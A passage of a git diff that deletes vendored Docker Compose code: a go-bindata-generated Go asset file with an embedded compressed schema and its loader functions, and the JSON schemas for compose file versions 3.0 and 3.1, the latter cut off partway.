[]byte("\x1f\x8b\x08\x00\x00\x09\x6e\x88\x00\xff\xec\x1a\xcb\x8e\xdb\x36\xf0\xee\xaf\x10\x94\xdc\xe2\xdd\x4d\xd1\xa0\x40\x73\xeb\xb1\xa7\xf6\xdc\x85\x23\xd0\xd2\x58\x66\x96\x22\x19\x92\x72\xd6\x09\xfc\xef\x05\xf5\x32\x45\x91\x22\x6d\x2b\xd9\x45\xd1\xd3\xae\xc5\x99\xe1\xbc\x67\x38\xe4\xf7\x55\x92\xa4\x6f\x65\xbe\x87\x0a\xa5\x1f\x93\x74\xaf\x14\xff\xf8\xf0\xf0\x59\x32\x7a\xd7\x7e\xbd\x67\xa2\x7c\x28\x04\xda\xa9\xbb\xf7\x1f\x1e\xda\x6f\x6f\xd2\xb5\xc6\xc3\x85\x46\xc9\x19\xdd\xe1\x32\x6b\x57\xb2\xc3\xaf\xf7\xbf\xdc\x6b\xf4\x16\x44\x1d\x39\x68\x20\xb6\xfd\x0c\xb9\x6a\xbf\x09\xf8\x52\x63\x01\x1a\xf9\x31\x3d\x80\x90\x98\xd1\x74\xb3\x5e\xe9\x35\x2e\x18\x07\xa1\x30\xc8\xf4\x63\xa2\x99\x4b\x92\x01\xa4\xff\x60\x90\x95\x4a\x60\x5a\xa6\xcd\xe7\x53\x43\x21\x49\x52\x09\xe2\x80\x73\x83\xc2\xc0\xea\x9b\x87\x33\xfd\x87\x01\x6c\x6d\x53\x35\x98\x6d\xbe\x73\xa4\x14\x08\xfa\xf7\x94\xb7\x66\xf9\xd3\x23\xba\xfb\xf6\xc7\xdd\x3f\xef\xef\x7e\xbf\xcf\xee\x36\xef\xde\x8e\x96\xb5\x7e\x05\xec\xda\xed\x0b\xd8\x61\x8a\x15\x66\x74\xd8\x3f\x1d\x20\x4f\xdd\x7f\xa7\x61\x63\x54\x14\x0d\x30\x22\xa3\xbd\x77\x88\x48\x18\xcb\x4c\x41\x7d\x65\xe2\x29\x24\xf3\x00\xf6\x42\x32\x77\xfb\x3b\x64\x1e\x8b\x73\x60\xa4\xae\x82\x16\xec\xa1\x5e\x48\x98\x76\xfb\x65\xec\x27\x21\x17\xa0\xc2\x2e\xdb\x42\xbd\x98\xc7\xea\xed\x6f\x13\x78\xd5\x0b\x3d\x0b\xdb\x42\x18\x7b\x37\x0c\x8e\xc2\xdb\xa5\x2a\x57\x78\xf9\x75\x35\x28\xcb\xa3\xa5\x02\x38\x61\x47\xfd\xcd\xa3\x8f\x16\xa0\x02\xaa\xd2\x41\x05\x49\x92\x6e\x6b\x4c\x0a\x5b\xa3\x8c\xc2\x5f\x9a\xc4\xa3\xf1\x31\x49\xbe\xdb\x99\xcc\xa0\xd3\xac\x8f\x7e\xf9\x0d\x3e\xac\x7b\x64\x19\xd6\x73\x46\x15\x3c\xab\x46\xa8\xf9\xad\x5b\x15\xb0\xfc\x09\xc4\x0e\x13\x88\xc5\x40\xa2\x94\x33\x2a\x23\x58\xaa\x8c\x89\xac\xc0\xb9\x4a\x4f\x16\xfa\x84\x5e\xd8\x9f\x06\x54\xe3\xd7\x66\xe5\x20\x98\xe6\x88\x67\xa8\x28\x46\x72\x20\x21\xd0\x31\x5d\x27\x29\x56\x50\x49\xb7\x88\x49\x5a\x53\xfc\xa5\x86\x3f\x3b\x10\x25\x6a\xb0\xe9\x16\x82\xf1\xe5\x09\x97\x82\xd5\x3c\xe3\x48\x68\x07\x9b\x57\x7f\x9a\xb3\xaa\x42\x74\x29\xaf\xbb\x44\x8e\x08\xcd\x33\xaa\x10\xa6\x20\x32\x8a\xaa\x90\x23\xe9\xa8\x03\x5a\xc8\xac\x2d\xf8\xb3\x6e\xb4\xcb\x5a\x7c\x69\x11\x18\xaa\xff\xa2\xf6\x28\xe8\x9c\x63\xb7\x64\xb4\x6b\x6b\xde\x52\x0b\x31\x93\x80\x44\xbe\xbf\x12\x9f\x55\x08\xd3\x18\xdd\x01\x55\xe2\xc8\x19\x6e\xfd\xe5\xd5\x39\x02\xd0\x43\x36\xe4\x92\x8b\xd5\x00\xf4\x80\x05\xa3\x55\x1f\x0d\x31\x09\x66\x48\xf2\x1a\xff\x99\x33\x09\xb6\x62\x2c\x01\xcd\xa5\x41\xd4\x91\x4e\x7a\x8c\xc7\x5e\xf0\x75\x92\xd2\xba\xda\x82\xd0\x3d\xec\x08\x72\xc7\x44\x85\x34\xb3\xfd\xde\xc6\xf2\x48\xd3\x0e\xcf\x33\x15\x68\xca\xa0\xcb\x3a\x22\x19\xc1\xf4\x69\x79\x17\x87\x67\x25\x50\xb6\x67\x52\xc5\xe7\x70\x03\x7d\x0f\x88\xa8\x7d\xbe\x87\xfc\x69\x06\xdd\x84\x1a\x61\x33\xa9\x62\x9c\x1c\x57\xa8\x0c\x03\xf1\x3c\x04\x42\xd0\x16\xc8\x55\x72\x2e\xaa\x7c\x83\x2c\x2b\x4b\x0d\xea\xf3\xb8\x49\xe7\xd2\x2d\x87\x6a\x7e\x21\xf0\x01\x44\x6c\x01\x67\xfc\xdc\x70\xd9\x8b\xe1\x06\x24\x09\x77\x9f\x23\xd0\x4f\xf7\x6d\xf3\x39\x13\x55\xcd\x7f\x84\xa4\x1b\xbb\x5d\x48\xac\xba\xef\xfa\x62\x49\x18\xd7\x50\x8c\xac\x52\xa1\x5c\xf7\x0d\x02\xa4\xc7\xae\x67\xd0\xee\x74\x93\x55\xac\xf0\x39\xe8\x04\xd8\xd6\x8d\x37\x53\x5f\x5c\x08\x93\xab\xfa\xc7\x28\xd3\x05\x0f\x10\x01\x69\x7c\xec\xc5\xb2\x79\x66\x37\xec\x62\x0d\x1c\x22\x18\x49\x08\x07\xbb\x57\x91\x23\x6a\x98\x1f\x3e\x44\xfa\x84\x0b\xf7\xb7\x59\x5c\x0f\xaa\x97\x66\x7c\x8f\x1c\x20\x75\x66\xa5\x09\x37\x17\x23\x9b\x40\xb4\xfd\xe0\x16\x9e\xe3\xc2\x9f\x2b\x9a\x0c\x61\x06\x18\x67\x42\x4d\xa2\xeb\xe7\x94\xfb\x76\xeb\x9b\xab\x3d\x17\xf8\x80\x09\x94\x30\x3e\xb5\x6c\x19\x23\x80\xe8\x28\xf5\x08\x40\x45\xc6\x28\x39\x46\x40\x4a\x85\x44\xf0\x40\x21\x21\xaf\x05\x56\xc7\x8c\x71\xb5\x78\x9f\x21\xf7\x55\x26\xf1\x37\x18\x5b\xf3\x9c\xef\x3b\x42\x1b\x8b\x21\x6b\x42\x72\xa5\x41\x7d\x29\x29\x1c\xc6\x8e\x44\x18\x4c\x54\xe1\x14\x95\x4a\x56\x8b\x3c\xf6\x80\xad\xf7\x44\xa2\x84\xd8\x23\xbc\x76\xb7\x71\xd8\xcc\x03\x97\x97\x00\x4f\x0a\x5d\x67\xc2\x50\x55\xb6\x7f\x9b\x79\xe5\xe4\x0c\x7d\x79\x94\xb9\xba\xae\x5b\x93\xaa\xc0\x34\x63\x1c\x68\x30\x36\xa4\x62\x3c\x2b\x05\xca\x21\xe3\x20\x30\x73\xaa\x62\x6d\x46\x7a\x51\x0b\xa4\xf7\x9f\x92\x91\xb8\xa4\x88\x84\xc2\x4c\x55\x7c\x77\xe5\xb1\x52\xa9\x70\xb0\xd7\x04\x57\xd8\x1f\x34\x0e\xaf\x8d\xe8\x00\xda\xea\xef\x2e\xfa\x33\x05\xff\xcc\x29\xa6\x0a\x4a\xed\x26\x53\xa7\x9a\xe9\x39\xe7\x5b\xce\x88\x5e\x73\x8f\xc4\xd8\xa0\x33\x7c\x24\x6d\x60\xee\x94\x1b\xc1\xd5\x89\x3a\xf9\x1a\xdd\x75\x34\xf4\xd6\x1d\x23\x1b\x27\xfc\x45\xc5\xdc\x66\x63\xe3\xad\xa7\xee\xa0\xaa\x65\xf0\x58\xd0\xc0\x50\x39\xd7\xd2\x0e\xa0\xc6\xd0\x7e\xd1\x6a\xa1\xdb\x64\x1d\x04\x05\x76\x73\xbb\xb2\x24\xbb\x60\xec\x6e\x9d\x58\x7b\x02\xae\x79\xb2\x09\x1a\x9c\xbf\xcf\xcf\xb6\x3b\x20\xef\xdc\x19\x4b\xb4\xb5\x26\xae\xae\xe0\xd6\xde\x28\x0e\xe1\x1c\x23\x40\x09\x6c\xd9\xa5\x4f\xd4\x66\x3e\x01\xf9\x3a\xc7\x46\x0a\x57\xc0\x6a\x77\xc1\x5b\x99\xfe\xdd\x21\xa5\xc6\x5c\x3e\x60\x54\x03\xd2\xb6\xe9\xe3\x60\xd4\xbe\xbb\x0c\x1a\x2e\x26\x48\x04\x70\x82\x73\x24\x43\x89\xe8\x86\xf1\x44\xcd\x0b\xa4\x20\x6b\xef\x65\x2f\x4a\xfd\x33\x39\x9f\x23\x81\x08\x01\x82\x65\x15\x93\x43\xd3\x02\x08\x3a\x5e\x55\x3e\x1b\xf4\x1d\xc2\xa4\x16\x90\xa1\x5c\x75\x57\xbf\x01\x9f\x4b\x2b\x46\xb1\x62\xce\x0c\x11\xb7\x65\x85\x9e\xb3\x7e\xdb\x06\x24\xd4\xd9\x8c\x9b\xfa\xd8\xc9\x82\xe1\x09\x6d\xe3\x77\x59\x75\x9e\x31\xd1\xb9\xd6\x7b\x3c\xa6\xdf\x71\x22\xba\x00\xa9\x33\xc9\x30\xf8\x09\xe2\x07\x4b\x4b\x77\xca\xc8\x38\x23\x38\x3f\x2e\x25\x61\xce\x68\xab\xe4\x18\x87\xb8\xd1\x03\xb5\x3b\xe8\x56\xa8\xe2\x2a\x18\xac\x0d\xc2\x57\x4c\x0b\xf6\xf5\x82\x0d\x97\x73\x25\x4e\x50\x0e\x56\xbe\xbb\x55\xd1\x52\x09\x84\xa9\xba\xb8\x9c\xdf\x2a\xd6\x0d\xd5\x7c\xf0\xcf\x40\xd6\x1f\xe0\xc2\xf7\xe8\x9e\x4c\x9f\xf3\x3a\x38\x0d\xac\xa0\x62\xc2\xe9\x80\x0b\x3c\xf4\x08\x89\xd8\x83\x2d\x50\xd5\xa2\xc6\xc7\x1d\x54\xc6\xf8\xf2\xa7\x8d\xf0\x88\x78\x13\x4e\x48\x98\xa3\x6a\xa9\xe8\x88\x1e\xa8\xa7\xce\x1a\x9c\xcc\xcf\x2d\x12\xff\xec\x22\xc4\x75\x98\xf7\x0e\x42\xd6\x5b\xea\x19\x21\x4c\x4f\x19\xae\x5b\xfe\xf8\x63\xca\xc9\x7f\x28\xb9\x2d\xe9\xf5\x77\x61\x1e\xab\x3e\x0e\x3d\xf3\x7a\xd0\xd5\x26\xda\xc4\xde\x8b\xa8\xe5\xf8\x6f\xda\x77\x7b\x44\xe0\xea\xf3\x2f\xec\x04\x6f\x48\x2e\xdd\x8b\xa6\x40\x6e\xe9\xa0\xfe\x4f\x2d\xff\x11\x47\xfc\x79\xfe\xd5\x3d\x20\x0b\xbe\xdc\x6a\xa0\xae\x2e\xce\x11\xcf\x95\x5e\x81\xcd\x5e\xda\x14\xe3\xc1\xa2\x61\x92\xe9\x99\x7f\x4e\x93\xd1\xf7\x69\x1d\xc6\x66\xcc\x86\x0d\xe6\x78\xe3\x3b\xae\x90\x73\x83\xa4\x1e\xc4\x73\xbf\x62\x6d\xda\x29\x71\x5e\xf2\x05\x93\xcd\xfd\xbb\x99\x3e\x60\xee\xde\xfb\x07\x15\xd0\x05\x86\x74\x6e\x9b\x5a\x87\x87\x5e\xbb\xd3\x77\x9b\x9e\xf8\x37\xf0\x27\xaf\x38\xb5\x9c\xf4\x38\x99\x49\x7d\x1f\x0f\x5a\xdb\x17\x98\x9b\x91\x7e\x2c\x90\xf6\x15\x89\x91\xdd\x37\xe6\x79\xca\x67\x46\xe7\xdb\x4e\x7b\xcc\xdb\xbf\xb1\xf4\xdc\x6a\xac\xcc\xbf\xcd\x7b\xd8\xd5\x69\xf5\x6f\x00\x00\x00\xff\xff\xfc\xf3\x11\x6a\x88\x2f\x00\x00")
-
-func dataConfig_schema_v31JsonBytes() ([]byte, error) {
-	return bindataRead(
-		_dataConfig_schema_v31Json,
-		"data/config_schema_v3.1.json",
-	)
-}
-
-func dataConfig_schema_v31Json() (*asset, error) {
-	bytes, err := dataConfig_schema_v31JsonBytes()
-	if err != nil {
-		return nil, err
-	}
-
-	info := bindataFileInfo{name: "data/config_schema_v3.1.json", size: 0, mode: os.FileMode(0), modTime: time.Unix(0, 0)}
-	a := &asset{bytes: bytes, info: info}
-	return a, nil
-}
-
-// Asset loads and returns the asset for the given name.
-// It returns an error if the asset could not be found or
-// could not be loaded.
-func Asset(name string) ([]byte, error) {
-	cannonicalName := strings.Replace(name, "\\", "/", -1)
-	if f, ok := _bindata[cannonicalName]; ok {
-		a, err := f()
-		if err != nil {
-			return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
-		}
-		return a.bytes, nil
-	}
-	return nil, fmt.Errorf("Asset %s not found", name)
-}
-
-// MustAsset is like Asset but panics when Asset would return an error.
-// It simplifies safe initialization of global variables.
-func MustAsset(name string) []byte {
-	a, err := Asset(name)
-	if err != nil {
-		panic("asset: Asset(" + name + "): " + err.Error())
-	}
-
-	return a
-}
-
-// AssetInfo loads and returns the asset info for the given name.
-// It returns an error if the asset could not be found or
-// could not be loaded.
-func AssetInfo(name string) (os.FileInfo, error) {
-	cannonicalName := strings.Replace(name, "\\", "/", -1)
-	if f, ok := _bindata[cannonicalName]; ok {
-		a, err := f()
-		if err != nil {
-			return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
-		}
-		return a.info, nil
-	}
-	return nil, fmt.Errorf("AssetInfo %s not found", name)
-}
-
-// AssetNames returns the names of the assets.
-func AssetNames() []string {
-	names := make([]string, 0, len(_bindata))
-	for name := range _bindata {
-		names = append(names, name)
-	}
-	return names
-}
-
-// _bindata is a table, holding each asset generator, mapped to its name.
-var _bindata = map[string]func() (*asset, error){
-	"data/config_schema_v3.0.json": dataConfig_schema_v30Json,
-	"data/config_schema_v3.1.json": dataConfig_schema_v31Json,
-}
-
-// AssetDir returns the file names below a certain
-// directory embedded in the file by go-bindata.
-// For example if you run go-bindata on data/... and data contains the
-// following hierarchy:
-//     data/
-//       foo.txt
-//       img/
-//         a.png
-//         b.png
-// then AssetDir("data") would return []string{"foo.txt", "img"}
-// AssetDir("data/img") would return []string{"a.png", "b.png"}
-// AssetDir("foo.txt") and AssetDir("notexist") would return an error
-// AssetDir("") will return []string{"data"}.
-func AssetDir(name string) ([]string, error) {
-	node := _bintree
-	if len(name) != 0 {
-		cannonicalName := strings.Replace(name, "\\", "/", -1)
-		pathList := strings.Split(cannonicalName, "/")
-		for _, p := range pathList {
-			node = node.Children[p]
-			if node == nil {
-				return nil, fmt.Errorf("Asset %s not found", name)
-			}
-		}
-	}
-	if node.Func != nil {
-		return nil, fmt.Errorf("Asset %s not found", name)
-	}
-	rv := make([]string, 0, len(node.Children))
-	for childName := range node.Children {
-		rv = append(rv, childName)
-	}
-	return rv, nil
-}
-
-type bintree struct {
-	Func     func() (*asset, error)
-	Children map[string]*bintree
-}
-var _bintree = &bintree{nil, map[string]*bintree{
-	"data": &bintree{nil, map[string]*bintree{
-		"config_schema_v3.0.json": &bintree{dataConfig_schema_v30Json, map[string]*bintree{}},
-		"config_schema_v3.1.json": &bintree{dataConfig_schema_v31Json, map[string]*bintree{}},
-	}},
-}}
-
-// RestoreAsset restores an asset under the given directory
-func RestoreAsset(dir, name string) error {
-	data, err := Asset(name)
-	if err != nil {
-		return err
-	}
-	info, err := AssetInfo(name)
-	if err != nil {
-		return err
-	}
-	err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
-	if err != nil {
-		return err
-	}
-	err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
-	if err != nil {
-		return err
-	}
-	err = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
-	if err != nil {
-		return err
-	}
-	return nil
-}
-
-// RestoreAssets restores an asset under the given directory recursively
-func RestoreAssets(dir, name string) error {
-	children, err := AssetDir(name)
-	// File
-	if err != nil {
-		return RestoreAsset(dir, name)
-	}
-	// Dir
-	for _, child := range children {
-		err = RestoreAssets(dir, filepath.Join(name, child))
-		if err != nil {
-			return err
-		}
-	}
-	return nil
-}
-
-func _filePath(dir, name string) string {
-	cannonicalName := strings.Replace(name, "\\", "/", -1)
-	return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
-}
-
diff --git a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json
deleted file mode 100644
index fbcd8bb859..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json
+++ /dev/null
@@ -1,383 +0,0 @@
-{
-  "$schema": "http://json-schema.org/draft-04/schema#",
-  "id": "config_schema_v3.0.json",
-  "type": "object",
-  "required": ["version"],
-
-  "properties": {
-    "version": {
-      "type": "string"
-    },
-
-    "services": {
-      "id": "#/properties/services",
-      "type": "object",
-      "patternProperties": {
-        "^[a-zA-Z0-9._-]+$": {
-          "$ref": "#/definitions/service"
-        }
-      },
-      "additionalProperties": false
-    },
-
-    "networks": {
-      "id": "#/properties/networks",
-      "type": "object",
-      "patternProperties": {
-        "^[a-zA-Z0-9._-]+$": {
-          "$ref": "#/definitions/network"
-        }
-      }
-    },
-
-    "volumes": {
-      "id": "#/properties/volumes",
-      "type": "object",
-      "patternProperties": {
-        "^[a-zA-Z0-9._-]+$": {
-          "$ref": "#/definitions/volume"
-        }
-      },
-      "additionalProperties": false
-    }
-  },
-
-  "additionalProperties": false,
-
-  "definitions": {
-
-    "service": {
-      "id": "#/definitions/service",
-      "type": "object",
-
-      "properties": {
-        "deploy": {"$ref": "#/definitions/deployment"},
-        "build": {
-          "oneOf": [
-            {"type": "string"},
-            {
-              "type": "object",
-              "properties": {
-                "context": {"type": "string"},
-                "dockerfile": {"type": "string"},
-                "args": {"$ref": "#/definitions/list_or_dict"}
-              },
-              "additionalProperties": false
-            }
-          ]
-        },
-        "cap_add": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
-        "cap_drop": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
-        "cgroup_parent": {"type": "string"},
-        "command": {
-          "oneOf": [
-            {"type": "string"},
-            {"type": "array", "items": {"type": "string"}}
-          ]
-        },
-        "container_name": {"type": "string"},
-        "depends_on": {"$ref": "#/definitions/list_of_strings"},
-        "devices": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
-        "dns": {"$ref": "#/definitions/string_or_list"},
-        "dns_search": {"$ref": "#/definitions/string_or_list"},
-        "domainname": {"type": "string"},
-        "entrypoint": {
-          "oneOf": [
-            {"type": "string"},
-            {"type": "array", "items": {"type": "string"}}
-          ]
-        },
-        "env_file": {"$ref": "#/definitions/string_or_list"},
-        "environment": {"$ref": "#/definitions/list_or_dict"},
-
-        "expose": {
-          "type": "array",
-          "items": {
-            "type": ["string", "number"],
-            "format": "expose"
-          },
-          "uniqueItems": true
-        },
-
-        "external_links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
-        "extra_hosts": {"$ref": "#/definitions/list_or_dict"},
-        "healthcheck": {"$ref": "#/definitions/healthcheck"},
-        "hostname": {"type": "string"},
-        "image": {"type": "string"},
-        "ipc": {"type": "string"},
-        "labels": {"$ref": "#/definitions/list_or_dict"},
-        "links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
-
-        "logging": {
-            "type": "object",
-
-            "properties": {
-                "driver": {"type": "string"},
-                "options": {
-                  "type": "object",
-                  "patternProperties": {
-                    "^.+$": {"type": ["string", "number", "null"]}
-                  }
-                }
-            },
-            "additionalProperties": false
-        },
-
-        "mac_address": {"type": "string"},
-        "network_mode": {"type": "string"},
-
-        "networks": {
-          "oneOf": [
-            {"$ref": "#/definitions/list_of_strings"},
-            {
-              "type": "object",
-              "patternProperties": {
-                "^[a-zA-Z0-9._-]+$": {
-                  "oneOf": [
-                    {
-                      "type": "object",
-                      "properties": {
-                        "aliases": {"$ref": "#/definitions/list_of_strings"},
-                        "ipv4_address": {"type": "string"},
-                        "ipv6_address": {"type": "string"}
-                      },
-                      "additionalProperties": false
-                    },
-                    {"type": "null"}
-                  ]
-                }
-              },
-              "additionalProperties": false
-            }
-          ]
-        },
-        "pid": {"type": ["string", "null"]},
-
-        "ports": {
-          "type": "array",
-          "items": {
-            "type": ["string", "number"],
-            "format": "ports"
-          },
-          "uniqueItems": true
-        },
-
-        "privileged": {"type": "boolean"},
-        "read_only": {"type": "boolean"},
-        "restart": {"type": "string"},
-        "security_opt": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
-        "shm_size": {"type": ["number", "string"]},
-        "sysctls": {"$ref": "#/definitions/list_or_dict"},
-        "stdin_open": {"type": "boolean"},
-        "stop_grace_period": {"type": "string", "format": "duration"},
-        "stop_signal": {"type": "string"},
-        "tmpfs": {"$ref": "#/definitions/string_or_list"},
-        "tty": {"type": "boolean"},
-        "ulimits": {
-          "type": "object",
-          "patternProperties": {
-            "^[a-z]+$": {
-              "oneOf": [
-                {"type": "integer"},
-                {
-                  "type":"object",
-                  "properties": {
-                    "hard": {"type": "integer"},
-                    "soft": {"type": "integer"}
-                  },
-                  "required": ["soft", "hard"],
-                  "additionalProperties": false
-                }
-              ]
-            }
-          }
-        },
-        "user": {"type": "string"},
-        "userns_mode": {"type": "string"},
-        "volumes": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
-        "working_dir": {"type": "string"}
-      },
-      "additionalProperties": false
-    },
-
-    "healthcheck": {
-      "id": "#/definitions/healthcheck",
-      "type": "object",
-      "additionalProperties": false,
-      "properties": {
-        "disable": {"type": "boolean"},
-        "interval": {"type": "string"},
-        "retries": {"type": "number"},
-        "test": {
-          "oneOf": [
-            {"type": "string"},
-            {"type": "array", "items": {"type": "string"}}
-          ]
-        },
-        "timeout": {"type": "string"}
-      }
-    },
-    "deployment": {
-      "id": "#/definitions/deployment",
-      "type": ["object", "null"],
-      "properties": {
-        "mode": {"type": "string"},
-        "replicas": {"type": "integer"},
-        "labels": {"$ref": "#/definitions/list_or_dict"},
-        "update_config": {
-          "type": "object",
-          "properties": {
-            "parallelism": {"type": "integer"},
-            "delay": {"type": "string", "format": "duration"},
-            "failure_action": {"type": "string"},
-            "monitor": {"type": "string", "format": "duration"},
-            "max_failure_ratio": {"type": "number"}
-          },
-          "additionalProperties": false
-        },
-        "resources": {
-          "type": "object",
-          "properties": {
-            "limits": {"$ref": "#/definitions/resource"},
-            "reservations": {"$ref": "#/definitions/resource"}
-          }
-        },
-        "restart_policy": {
-          "type": "object",
-          "properties": {
-            "condition": {"type": "string"},
-            "delay": {"type": "string", "format": "duration"},
-            "max_attempts": {"type": "integer"},
-            "window": {"type": "string", "format": "duration"}
-          },
-          "additionalProperties": false
-        },
-        "placement": {
-          "type": "object",
-          "properties": {
-            "constraints": {"type": "array", "items": {"type": "string"}}
-          },
-          "additionalProperties": false
-        }
-      },
-      "additionalProperties": false
-    },
-
-    "resource": {
-      "id": "#/definitions/resource",
-      "type": "object",
-      "properties": {
-        "cpus": {"type": "string"},
-        "memory": {"type": "string"}
-      },
-      "additionalProperties": false
-    },
-
-    "network": {
-      "id": "#/definitions/network",
-      "type": ["object", "null"],
-      "properties": {
-        "driver": {"type": "string"},
-        "driver_opts": {
-          "type": "object",
-          "patternProperties": {
-            "^.+$": {"type": ["string", "number"]}
-          }
-        },
-        "ipam": {
-          "type": "object",
-          "properties": {
-            "driver": {"type": "string"},
-            "config": {
-              "type": "array",
-              "items": {
-                "type": "object",
-                "properties": {
-                  "subnet": {"type": "string"}
-                },
-                "additionalProperties": false
-              }
-            }
-          },
-          "additionalProperties": false
-        },
-        "external": {
-          "type": ["boolean", "object"],
-          "properties": {
-            "name": {"type": "string"}
-          },
-          "additionalProperties": false
-        },
-        "internal": {"type": "boolean"},
-        "labels": {"$ref": "#/definitions/list_or_dict"}
-      },
-      "additionalProperties": false
-    },
-
-    "volume": {
-      "id": "#/definitions/volume",
-      "type": ["object", "null"],
-      "properties": {
-        "driver": {"type": "string"},
-        "driver_opts": {
-          "type": "object",
-          "patternProperties": {
-            "^.+$": {"type": ["string", "number"]}
-          }
-        },
-        "external": {
-          "type": ["boolean", "object"],
-          "properties": {
-            "name": {"type": "string"}
-          },
-          "additionalProperties": false
-        },
-        "labels": {"$ref": "#/definitions/list_or_dict"}
-      },
-      "additionalProperties": false
-    },
-
-    "string_or_list": {
-      "oneOf": [
-        {"type": "string"},
-        {"$ref": "#/definitions/list_of_strings"}
-      ]
-    },
-
-    "list_of_strings": {
-      "type": "array",
-      "items": {"type": "string"},
-      "uniqueItems": true
-    },
-
-    "list_or_dict": {
-      "oneOf": [
-        {
-          "type": "object",
-          "patternProperties": {
-            ".+": {
-              "type": ["string", "number", "null"]
-            }
-          },
-          "additionalProperties": false
-        },
-        {"type": "array", "items": {"type": "string"}, "uniqueItems": true}
-      ]
-    },
-
-    "constraints": {
-      "service": {
-        "id": "#/definitions/constraints/service",
-        "anyOf": [
-          {"required": ["build"]},
-          {"required": ["image"]}
-        ],
-        "properties": {
-          "build": {
-            "required": ["context"]
-          }
-        }
-      }
-    }
-  }
-}
diff --git a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json
deleted file mode 100644
index b7037485f9..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json
+++ /dev/null
@@ -1,428 +0,0 @@
-{
-  "$schema": "http://json-schema.org/draft-04/schema#",
-  "id": "config_schema_v3.1.json",
-  "type": "object",
-  "required": ["version"],
-
-  "properties": {
-    "version": {
-      "type": "string"
-    },
-
-    "services": {
-      "id": "#/properties/services",
-      "type": "object",
-      "patternProperties": {
-        "^[a-zA-Z0-9._-]+$": {
-          "$ref": "#/definitions/service"
-        }
-      },
-      "additionalProperties": false
-    },
-
-    "networks": {
-      "id": "#/properties/networks",
-      "type": "object",
-      "patternProperties": {
-        "^[a-zA-Z0-9._-]+$": {
-          "$ref": "#/definitions/network"
-        }
-      }
-    },
-
-    "volumes": {
-      "id": "#/properties/volumes",
-      "type": "object",
-      "patternProperties": {
-        "^[a-zA-Z0-9._-]+$": {
-          "$ref": "#/definitions/volume"
-        }
-      },
-      "additionalProperties": false
-    },
-
-    "secrets": {
-      "id": "#/properties/secrets",
-      "type": "object",
-      "patternProperties": {
-        "^[a-zA-Z0-9._-]+$": {
-          "$ref": "#/definitions/secret"
-        }
-      },
-      "additionalProperties": false
-    }
-  },
-
-  "additionalProperties": false,
-
-  "definitions": {
-
-    "service": {
-      "id": "#/definitions/service",
-      "type": "object",
-
-      "properties": {
-        "deploy": {"$ref": "#/definitions/deployment"},
-        "build": {
-          "oneOf": [
-            {"type": "string"},
-            {
-              "type": "object",
-              "properties": {
-                "context": {"type": "string"},
-                "dockerfile": {"type": "string"},
-                "args": {"$ref": "#/definitions/list_or_dict"}
-              },
-              "additionalProperties": false
-            }
-          ]
-        },
-        "cap_add": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
-        "cap_drop": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
-        "cgroup_parent": {"type": "string"},
-        "command": {
-          "oneOf": [
-            {"type": "string"},
-            {"type": "array", "items": {"type": "string"}}
-          ]
-        },
-        "container_name": {"type": "string"},
-        "depends_on": {"$ref": "#/definitions/list_of_strings"},
-        "devices": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
-        "dns": {"$ref": "#/definitions/string_or_list"},
-        "dns_search": {"$ref": "#/definitions/string_or_list"},
-        "domainname": {"type": "string"},
-        "entrypoint": {
-          "oneOf": [
-            {"type": "string"},
-            {"type": "array", "items": {"type": "string"}}
-          ]
-        },
-        "env_file": {"$ref": "#/definitions/string_or_list"},
-        "environment": {"$ref": "#/definitions/list_or_dict"},
-
-        "expose": {
-          "type": "array",
-          "items": {
-            "type": ["string", "number"],
-            "format": "expose"
-          },
-          "uniqueItems": true
-        },
-
-        "external_links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
-        "extra_hosts": {"$ref": "#/definitions/list_or_dict"},
-        "healthcheck": {"$ref": "#/definitions/healthcheck"},
-        "hostname": {"type": "string"},
-        "image": {"type": "string"},
-        "ipc": {"type": "string"},
-        "labels": {"$ref": "#/definitions/list_or_dict"},
-        "links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
-
-        "logging": {
-            "type": "object",
-
-            "properties": {
-                "driver": {"type": "string"},
-                "options": {
-                  "type": "object",
-                  "patternProperties": {
-                    "^.+$": {"type": ["string", "number", "null"]}
-                  }
-                }
-            },
-            "additionalProperties": false
-        },
-
-        "mac_address": {"type": "string"},
-        "network_mode": {"type": "string"},
-
-        "networks": {
-          "oneOf": [
-            {"$ref": "#/definitions/list_of_strings"},
-            {
-              "type": "object",
-              "patternProperties": {
-                "^[a-zA-Z0-9._-]+$": {
-                  "oneOf": [
-                    {
-                      "type": "object",
-                      "properties": {
-                        "aliases": {"$ref": "#/definitions/list_of_strings"},
-                        "ipv4_address": {"type": "string"},
-                        "ipv6_address": {"type": "string"}
-                      },
-                      "additionalProperties": false
-                    },
-                    {"type": "null"}
-                  ]
-                }
-              },
-              "additionalProperties": false
-            }
-          ]
-        },
-        "pid": {"type": ["string", "null"]},
-
-        "ports": {
-          "type": "array",
-          "items": {
-            "type": ["string", "number"],
-            "format": "ports"
-          },
-          "uniqueItems": true
-        },
-
-        "privileged": {"type": "boolean"},
-        "read_only": {"type": "boolean"},
-        "restart": {"type": "string"},
-        "security_opt": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
-        "shm_size": {"type": ["number", "string"]},
-        "secrets": {
-          "type": "array",
-          "items": {
